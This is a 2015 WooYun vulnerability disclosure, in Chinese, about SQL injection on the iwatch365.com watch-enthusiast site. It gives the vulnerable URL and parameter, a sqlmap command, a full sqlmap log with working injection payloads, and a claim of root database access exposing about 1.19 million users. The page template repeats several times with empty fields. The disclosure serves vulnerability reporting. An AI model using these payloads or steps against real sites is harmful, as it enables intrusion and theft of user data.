爱表族官网多处Root权限SQL注入导致120万用户信息泄露（可getshell)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144911

漏洞标题：爱表族官网多处Root权限SQL注入导致120万用户信息泄露（可getshell)

漏洞作者：路人甲

提交时间：2015-10-06 13:23

修复时间：2015-11-20 13:24

公开时间：2015-11-20 13:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-06：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-11-20：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

爱表族官网多处Root权限SQL注入导致120万用户信息泄露（可getshell)
通过论坛：http://www.iwatch365.com/forum.php
得知会员总数

详细说明：

注入点：http://www.iwatch365.com/watch/?px=6&desc=desc
http://www.iwatch365.com/index.php?m=content&c=index&a=lists&catid=81&ids=
（直接报错页面）
通过论坛：http://www.iwatch365.com/forum.php
得知会员总数 1189045
【手工测试】：
desc参数后加单引号
页面最下方直接报错

MySQL Query : SELECT COUNT(*) as count FROM biao_wanbiaomoxing_data p where 1 order by p.guoneijia desc\'
    MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
    MySQL Errno : 1064
    Message : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
    Need Help?

【sqlmap】：
python sqlmap.py -u "http://www.iwatch365.com/watch/?px=6&desc=desc" -p desc
【sqlmap截图】：

【数据库信息】：

【DBA权限故虽然我没找到论坛的数据库表，但是既然最高权限了，主站下的数据都不在话下了吧？】

漏洞证明：

sqlmap全过程：

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 17:23:18
[17:23:18] [INFO] testing connection to the target URL
[17:23:19] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[17:23:20] [INFO] target URL is stable
[17:23:21] [INFO] heuristic (basic) test shows that GET parameter 'desc' might b
e injectable (possible DBMS: 'MySQL')
[17:23:21] [INFO] testing for SQL injection on GET parameter 'desc'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you
want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and ri
sk (1) values? [Y/n]
[17:23:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:23:23] [WARNING] reflective value(s) found and filtering out
[17:23:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MyS
QL comment)'
[17:23:30] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQ
L comment)'
[17:23:39] [INFO] testing 'MySQL boolean-based blind - WHERE, HAVING, ORDER BY o
r GROUP BY clause (RLIKE)'
[17:23:44] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_S
ET - original value)'
[17:23:44] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT -
original value)'
[17:23:45] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*i
nt - original value)'
[17:23:46] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace
(original value)'
[17:23:46] [INFO] testing 'MySQL < 5.0 boolean-based blind - Parameter replace (
original value)'
[17:23:47] [INFO] testing 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER
 BY clauses'
[17:23:48] [INFO] GET parameter 'desc' seems to be 'MySQL >= 5.0 boolean-based b
lind - GROUP BY and ORDER BY clauses' injectable
[17:23:48] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[17:23:48] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (EXTRACT
VALUE)'
[17:23:49] [INFO] testing 'MySQL >= 5.1 error-based - Parameter replace (UPDATEX
ML)'
[17:23:49] [INFO] testing 'MySQL >= 5.5 error-based - Parameter replace (BIGINT
UNSIGNED)'
[17:23:49] [INFO] testing 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clau
ses'
[17:23:50] [INFO] GET parameter 'desc' is 'MySQL >= 5.0 error-based - GROUP BY a
nd ORDER BY clauses' injectable
[17:23:50] [INFO] testing 'MySQL inline queries'
[17:23:50] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[17:23:50] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[17:23:50] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[17:23:51] [INFO] testing 'MySQL > 5.0.11 AND time-based blind (comment)'
[17:23:51] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query)'
[17:23:51] [INFO] testing 'MySQL < 5.0.12 AND time-based blind (heavy query - co
mment)'
[17:23:51] [INFO] testing 'MySQL > 5.0.11 OR time-based blind'
[17:23:59] [INFO] GET parameter 'desc' seems to be 'MySQL > 5.0.11 OR time-based
 blind' injectable
[17:23:59] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[17:23:59] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[17:24:05] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[17:24:12] [INFO] testing 'MySQL UNION query (NULL) - 22 to 40 columns'
[17:24:19] [INFO] testing 'MySQL UNION query (random number) - 22 to 40 columns'
[17:24:25] [INFO] testing 'MySQL UNION query (NULL) - 42 to 60 columns'
[17:24:32] [INFO] testing 'MySQL UNION query (random number) - 42 to 60 columns'
[17:24:39] [INFO] testing 'MySQL UNION query (NULL) - 62 to 80 columns'
[17:24:45] [INFO] testing 'MySQL UNION query (random number) - 62 to 80 columns'
[17:24:52] [INFO] testing 'MySQL UNION query (NULL) - 82 to 100 columns'
[17:24:58] [INFO] testing 'MySQL UNION query (random number) - 82 to 100 columns
'
[17:25:05] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'desc' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection points with a total of 292 HTTP(s) req
uests:
---
Parameter: desc (GET)
    Type: boolean-based blind
    Title: MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses
    Payload: px=6&desc=desc,(SELECT (CASE WHEN (3448=3448) THEN 0x64657363 ELSE
3448*(SELECT 3448 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
    Type: error-based
    Title: MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses
    Payload: px=6&desc=desc,(SELECT 6385 FROM(SELECT COUNT(*),CONCAT(0x717671707
1,(SELECT (CASE WHEN (6385=6385) THEN 1 ELSE 0 END)),0x7171787671,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 OR time-based blind
    Payload: px=6&desc=-1369 OR 2737=SLEEP(5)
---
[17:25:31] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.21, PHP 5.4.16
back-end DBMS: MySQL 5.0

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144911

漏洞标题：爱表族官网多处Root权限SQL注入导致120万用户信息泄露（可getshell)

相关厂商：爱表族

漏洞作者：路人甲

提交时间：2015-10-06 13:23

修复时间：2015-11-20 13:24

公开时间：2015-11-20 13:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0144911

漏洞标题：爱表族官网多处Root权限SQL注入导致120万用户信息泄露（可getshell)

相关厂商：爱表族

漏洞作者： 路人甲

提交时间：2015-10-06 13:23

修复时间：2015-11-20 13:24

公开时间：2015-11-20 13:24

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0144911"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云